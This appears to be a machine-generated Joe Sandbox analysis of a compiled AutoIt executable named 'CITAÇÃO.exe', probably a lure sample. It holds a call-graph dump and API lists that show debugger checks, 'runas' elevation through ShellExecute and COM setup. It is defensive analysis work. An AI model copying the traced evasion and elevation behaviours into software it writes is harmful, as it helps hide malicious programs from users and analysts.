4135bb _malloc 46 API calls 85813->85814 85815 432174 85814->85815 85817 432189 85815->85817 85821 4320f8 46 API calls _free 85815->85821 85817->85787 85818 432198 85818->85787 85819->85797 85820->85800 85821->85818 85822->85118 85823->85121 85824->85136 85825->85136 85826->85136 85827->85135 85828->85136 85829->85136 85830->85143 85831->85152 85832->85154 85833->85154 85883 410160 85834->85883 85836 41012f GetFullPathNameW 85837 410147 moneypunct 85836->85837 85837->84974 85839 4102cb SHGetDesktopFolder 85838->85839 85842 410333 _wcsncpy 85838->85842 85840 4102e0 _wcsncpy 85839->85840 85839->85842 85841 41031c SHGetPathFromIDListW 85840->85841 85840->85842 85841->85842 85842->84977 85844 4101bb 85843->85844 85849 425f4a 85843->85849 85845 410160 52 API calls 85844->85845 85847 4101c7 85845->85847 85846 4114ab __wcsicoll 58 API calls 85846->85849 85887 410200 52 API calls 2 library calls 85847->85887 85849->85846 85851 425f6e 85849->85851 85850 4101d6 85888 410200 52 API calls 2 library calls 85850->85888 85851->84979 85853 4101e9 85853->84979 85855 40f760 126 API calls 85854->85855 85856 40f584 85855->85856 85857 429335 85856->85857 85858 40f58c 85856->85858 85861 4528bd 118 API calls 85857->85861 85859 40f598 85858->85859 85860 429358 85858->85860 85906 4033c0 113 API calls 7 library calls 85859->85906 85907 434034 86 API calls _wprintf 85860->85907 85863 42934b 85861->85863 85866 429373 85863->85866 85867 42934f 85863->85867 85865 40f5b4 85865->84975 85869 4115d7 52 API calls 85866->85869 85870 431e58 82 API calls 85867->85870 85868 429369 85868->85866 85879 4293c5 moneypunct 85869->85879 85870->85860 85871 42959c 85872 413748 _free 46 API calls 85871->85872 85873 4295a5 85872->85873 85874 431e58 82 API calls 85873->85874 85875 4295b1 85874->85875 85879->85871 85880 401b10 52 API calls 85879->85880 85889 444af8 85879->85889 85892 402780 85879->85892 85900 4022d0 85879->85900 85908 44c7dd 64 API calls 3 library calls 85879->85908 85909 44b41c 52 API calls 
85879->85909 85880->85879 85884 410167 _wcslen 85883->85884 85885 4115d7 52 API calls 85884->85885 85886 41017e _wcscpy 85885->85886 85886->85836 85887->85850 85888->85853 85890 4115d7 52 API calls 85889->85890 85891 444b27 _memmove 85890->85891 85891->85879 85893 402827 85892->85893 85898 402790 moneypunct _memmove 85892->85898 85895 4115d7 52 API calls 85893->85895 85894 4115d7 52 API calls 85896 402797 85894->85896 85895->85898 85897 4115d7 52 API calls 85896->85897 85899 4027bd 85896->85899 85897->85899 85898->85894 85899->85879 85901 4022e0 85900->85901 85904 40239d 85900->85904 85902 4115d7 52 API calls 85901->85902 85901->85904 85905 402320 moneypunct 85901->85905 85902->85905 85903 4115d7 52 API calls 85903->85905 85904->85879 85905->85903 85905->85904 85906->85865 85907->85868 85908->85879 85909->85879 85911 402539 moneypunct 85910->85911 85912 402417 85910->85912 85911->84983 85912->85911 85913 4115d7 52 API calls 85912->85913 85914 402443 85913->85914 85915 4115d7 52 API calls 85914->85915 85917 4024b4 85915->85917 85917->85911 85918 4022d0 52 API calls 85917->85918 85939 402880 95 API calls 2 library calls 85917->85939 85918->85917 85923 401566 85919->85923 85920 401794 85940 40e9a0 90 API calls 85920->85940 85922 40167a 85926 4017c0 85922->85926 85941 45e737 90 API calls 3 library calls 85922->85941 85923->85920 85923->85922 85925 4010a0 52 API calls 85923->85925 85925->85923 85926->84985 85928 40bc70 52 API calls 85927->85928 85938 40d451 85928->85938 85929 40d50f 85944 410600 52 API calls 85929->85944 85931 427c01 85945 45e737 90 API calls 3 library calls 85931->85945 85932 40e0a0 52 API calls 85932->85938 85934 401b10 52 API calls 85934->85938 85935 40d519 85935->84988 85938->85929 85938->85931 85938->85932 85938->85934 85938->85935 85942 40f310 53 API calls 85938->85942 85943 40d860 91 API calls 85938->85943 85939->85917 85940->85922 85941->85926 85942->85938 85943->85938 85944->85935 85945->85935 85946->85001 85947->85002 85949 42c5fe 85948->85949 
85964 4091c6 85948->85964 85950 40bc70 52 API calls 85949->85950 85949->85964 85951 42c64e InterlockedIncrement 85950->85951 85952 42c665 85951->85952 85957 42c697 85951->85957 85955 42c672 InterlockedDecrement Sleep InterlockedIncrement 85952->85955 85952->85957 85953 42c737 InterlockedDecrement 85954 42c74a 85953->85954 85958 408f40 VariantClear 85954->85958 85955->85952 85955->85957 85956 42c731 85956->85953 85957->85953 85957->85956 86241 408e80 85957->86241 85960 42c752 85958->85960 86254 410c60 85960->86254 85964->85050 85965 42c6db 85966 402160 52 API calls 85965->85966 85967 42c6e5 85966->85967 85968 45340c 85 API calls 85967->85968 85969 42c6f1 85968->85969 86251 40d200 52 API calls 2 library calls 85969->86251 85971 42c6fb 86252 465124 53 API calls 85971->86252 85973 42c715 85974 42c76a 85973->85974 85975 42c719 85973->85975 85976 401b10 52 API calls 85974->85976 86253 46fe32 VariantClear 85975->86253 85978 42c77e 85976->85978 85979 401980 53 API calls 85978->85979 85985 42c796 85979->85985 85980 42c812 86265 46fe32 VariantClear 85980->86265 85982 42c82a InterlockedDecrement 86266 46ff07 54 API calls 85982->86266 85984 42c864 86267 45e737 90 API calls 3 library calls 85984->86267 85985->85980 85985->85984 86259 40ba10 85985->86259 85986 42c9ec 86309 47d33e 330 API calls 85986->86309 85990 42c9fe 85992 408f40 VariantClear 85998 42c849 85992->85998 85994 42c874 85997 408f40 VariantClear 85994->85997 86005 42ca59 85994->86005 85995 402780 52 API calls 85995->85998 86000 42c891 85997->86000 85998->85986 85998->85992 85998->85995 86001 401980 53 API calls 85998->86001 86268 40a780 85998->86268 86003 410c60 VariantClear 86000->86003 86001->85998 86003->85964 86005->86005 86007 40afc4 86006->86007 86008 40b156 86006->86008 86009 40afd5 86007->86009 86010 42d1e3 86007->86010 86324 45e737 90 API calls 3 library calls 86008->86324 86015 40a780 199 API calls 86009->86015 86030 40b11a moneypunct 86009->86030 86325 45e737 90 API calls 3 library calls 86010->86325 
86013 40b143 86013->85050 86014 42d1f8 86019 408f40 VariantClear 86014->86019 86017 40b00a 86015->86017 86017->86014 86020 40b012 86017->86020 86018 42d4db 86018->86018 86019->86013 86021 40b04a 86020->86021 86022 42d231 VariantClear 86020->86022 86029 40b094 moneypunct 86020->86029 86028 40b05c moneypunct 86021->86028 86326 40e270 VariantClear moneypunct 86021->86326 86022->86028 86023 42d45a VariantClear 86023->86030 86025 40b108 86025->86030 86327 40e270 VariantClear moneypunct 86025->86327 86027 4115d7 52 API calls 86027->86029 86028->86027 86028->86029 86029->86025 86031 42d425 moneypunct 86029->86031 86030->86013 86328 45e737 90 API calls 3 library calls 86030->86328 86031->86023 86031->86030 86033 408fff 86032->86033 86053 40900d 86032->86053 86375 403ea0 52 API calls __cinit 86033->86375 86036 42c3f6 86378 45e737 90 API calls 3 library calls 86036->86378 86038 42c44a 86380 45e737 90 API calls 3 library calls 86038->86380 86039 40a780 199 API calls 86039->86053 86040 4090f2 moneypunct 86040->85050 86041 42c47b 86381 451b42 61 API calls 86041->86381 86045 42c4cb 86329 47faae 86045->86329 86046 42c564 86047 408f40 VariantClear 86046->86047 86047->86040 86048 42c491 86048->86040 86382 45e737 90 API calls 3 library calls 86048->86382 86050 42c548 86385 45e737 90 API calls 3 library calls 86050->86385 86051 42c4da 86051->86040 86383 45e737 90 API calls 3 library calls 86051->86383 86052 409112 86052->86050 86063 40912b 86052->86063 86053->86036 86053->86038 86053->86039 86053->86040 86053->86041 86053->86045 86053->86046 86053->86050 86053->86052 86054 4090df 86053->86054 86056 42c528 86053->86056 86058 4090ea 86053->86058 86377 4534e3 52 API calls 86053->86377 86379 40c4e0 199 API calls 86053->86379 86054->86058 86059 408e80 VariantClear 86054->86059 86384 45e737 90 API calls 3 library calls 86056->86384 86062 408f40 VariantClear 86058->86062 86059->86058 86062->86040 86063->86040 86376 403e10 53 API calls 86063->86376 86065 40914b 86066 408f40 VariantClear 
86065->86066 86066->86040 86572 408d90 86067->86572 86069 429778 86070 410c60 VariantClear 86069->86070 86071 429780 86070->86071 86072 408cf9 86072->86069 86073 42976c 86072->86073 86075 408d2d 86072->86075 86597 45e737 90 API calls 3 library calls 86073->86597 86588 403d10 86075->86588 86078 408d71 moneypunct 86078->85050 86079 408f40 VariantClear 86080 408d45 moneypunct 86079->86080 86080->86078 86080->86079 86082 425c87 86081->86082 86083 40d15f 86081->86083 86084 425cc7 86082->86084 86085 425ca1 TranslateAcceleratorW 86082->86085 86083->85050 86085->86083 86087 42602f 86086->86087 86090 40d17f 86086->86090 86087->85050 86088 40d18c 86088->85050 86089 42608e IsDialogMessageW 86089->86088 86089->86090 86090->86088 86090->86089 86811 430c46 GetClassLongW 86090->86811 86093 4096c6 _wcslen 86092->86093 86094 4115d7 52 API calls 86093->86094 86156 40a70c moneypunct _memmove 86093->86156 86095 4096fa _memmove 86094->86095 86097 4115d7 52 API calls 86095->86097 86096 4013a0 52 API calls 86098 4297aa 86096->86098 86099 40971b 86097->86099 86101 4115d7 52 API calls 86098->86101 86100 409749 CharUpperBuffW 86099->86100 86103 40976a moneypunct 86099->86103 86099->86156 86100->86103 86143 4297d1 _memmove 86101->86143 86151 4097e5 moneypunct 86103->86151 86813 47dcbb 201 API calls 86103->86813 86105 42a452 86106 408f40 VariantClear 86105->86106 86107 42ae92 86106->86107 86108 410c60 VariantClear 86107->86108 86109 42aea4 86108->86109 86110 409aa2 86112 4115d7 52 API calls 86110->86112 86117 409afe 86110->86117 86110->86143 86111 40a689 86114 4115d7 52 API calls 86111->86114 86112->86117 86113 4115d7 52 API calls 86113->86151 86130 40a6af moneypunct _memmove 86114->86130 86115 409b2a 86119 429dbe 86115->86119 86180 409b4d moneypunct _memmove 86115->86180 86819 40b400 VariantClear VariantClear moneypunct 86115->86819 86116 40c2c0 52 API calls 86116->86151 86117->86115 86118 4115d7 52 API calls 86117->86118 86120 429d31 86118->86120 86125 429dd3 86119->86125 86820 40b400 
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 004096C1
                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • _memmove.LIBCMT ref: 0040970C
                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                      • _memmove.LIBCMT ref: 00409D96
                                                      • _memmove.LIBCMT ref: 0040A6C4
                                                      • _memmove.LIBCMT ref: 004297E5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                      • String ID:
                                                      • API String ID: 2383988440-0
                                                      • Opcode ID: 6ff525b2c59c7c054ff9d2bd3b1975f8866825bf581303900bce7b5d9fa65f40
                                                      • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                      • Opcode Fuzzy Hash: 6ff525b2c59c7c054ff9d2bd3b1975f8866825bf581303900bce7b5d9fa65f40
                                                      • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

                                                      Control-flow Graph

                                                      APIs
                                                      • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                        • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe,00000104,?), ref: 00401F4C
                                                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                        • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                      • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                      • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                        • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                      • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                      • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                      • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                        • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                        • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                        • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                        • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                        • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                        • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                        • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                        • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                        • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                        • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                        • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                        • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                      • String ID: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                      • API String ID: 2495805114-2377430423
                                                      • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                      • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                      • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                      • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

                                                      Control-flow Graph

                                                      APIs
                                                      • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                      • CLSIDFromProgID.COMBASE(?,?), ref: 0046CBDF
                                                      • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                      • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                      • _wcslen.LIBCMT ref: 0046CDB0
                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                      • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                      • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                        • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                        • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                        • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                      Strings
                                                      • NULL Pointer assignment, xrefs: 0046CEA6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                      • String ID: NULL Pointer assignment
                                                      • API String ID: 440038798-2785691316
                                                      • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                      • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                      • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                      • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95

                                                      Control-flow Graph

                                                      Control-flow graph for the function at 0040E500 (legend: Executed / Not Executed; graph edge data omitted; besides the APIs listed below, the graph also shows calls to GetSystemInfo)
                                                      APIs
                                                      • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                      • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                      • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                      • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                      • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                      Strings
                                                      Similarity
                                                      • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                      • String ID: 0SH
                                                      • API String ID: 3363477735-851180471
                                                      • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                      • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                      • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                      • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                      APIs
                                                      • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                      • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                      Strings
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: IsThemeActive$uxtheme.dll
                                                      • API String ID: 2574300362-3542929980
                                                      • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                      • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                      • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                      • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                      APIs
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                      • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                      • TranslateMessage.USER32(?), ref: 00409556
                                                      • DispatchMessageW.USER32(?), ref: 00409561
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                      Strings
                                                      Similarity
                                                      • API ID: Message$Peek$DispatchSleepTranslate
                                                      • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                      • API String ID: 1762048999-758534266
                                                      • Opcode ID: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                      • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                      • Opcode Fuzzy Hash: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                      • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                                                      Control-flow Graph

                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe,00000104,?), ref: 00401F4C
                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                      • __wcsicoll.LIBCMT ref: 00402007
                                                      • __wcsicoll.LIBCMT ref: 0040201D
                                                      • __wcsicoll.LIBCMT ref: 00402033
                                                        • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                      • __wcsicoll.LIBCMT ref: 00402049
                                                      • _wcscpy.LIBCMT ref: 0040207C
                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe,00000104), ref: 00428B5B
                                                      Strings
                                                      Similarity
                                                      • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe$CMDLINE$CMDLINERAW
                                                      • API String ID: 3948761352-1924437800
                                                      • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                      • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                      • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                      • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: __fread_nolock$_fseek_wcscpy
                                                      • String ID: D)E$D)E$FILE
                                                      • API String ID: 3888824918-361185794
                                                      • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                      • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                      • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                      • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                      • __wsplitpath.LIBCMT ref: 0040E41C
                                                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                      • _wcsncat.LIBCMT ref: 0040E433
                                                      • __wmakepath.LIBCMT ref: 0040E44F
                                                        • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                      • _wcscpy.LIBCMT ref: 0040E487
                                                        • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                      • _wcscat.LIBCMT ref: 00427541
                                                      • _wcslen.LIBCMT ref: 00427551
                                                      • _wcslen.LIBCMT ref: 00427562
                                                      • _wcscat.LIBCMT ref: 0042757C
                                                      • _wcsncpy.LIBCMT ref: 004275BC
                                                      Strings
                                                      Similarity
                                                      • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                      • String ID: Include$\
                                                      • API String ID: 3173733714-3429789819
                                                      • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                      • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                      • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                      • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

                                                      Control-flow Graph

                                                      APIs
                                                      • _fseek.LIBCMT ref: 0045292B
                                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                        • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                        • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                      • __fread_nolock.LIBCMT ref: 00452961
                                                      • __fread_nolock.LIBCMT ref: 00452971
                                                      • __fread_nolock.LIBCMT ref: 0045298A
                                                      • __fread_nolock.LIBCMT ref: 004529A5
                                                      • _fseek.LIBCMT ref: 004529BF
                                                      • _malloc.LIBCMT ref: 004529CA
                                                      • _malloc.LIBCMT ref: 004529D6
                                                      • __fread_nolock.LIBCMT ref: 004529E7
                                                      • _free.LIBCMT ref: 00452A17
                                                      • _free.LIBCMT ref: 00452A20
                                                      Similarity
                                                      • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                      • String ID:
                                                      • API String ID: 1255752989-0
                                                      • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                      • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                      • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                      • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                      • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                      • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                      • LoadIconW.USER32(00400000,000000A9), ref: 00410542
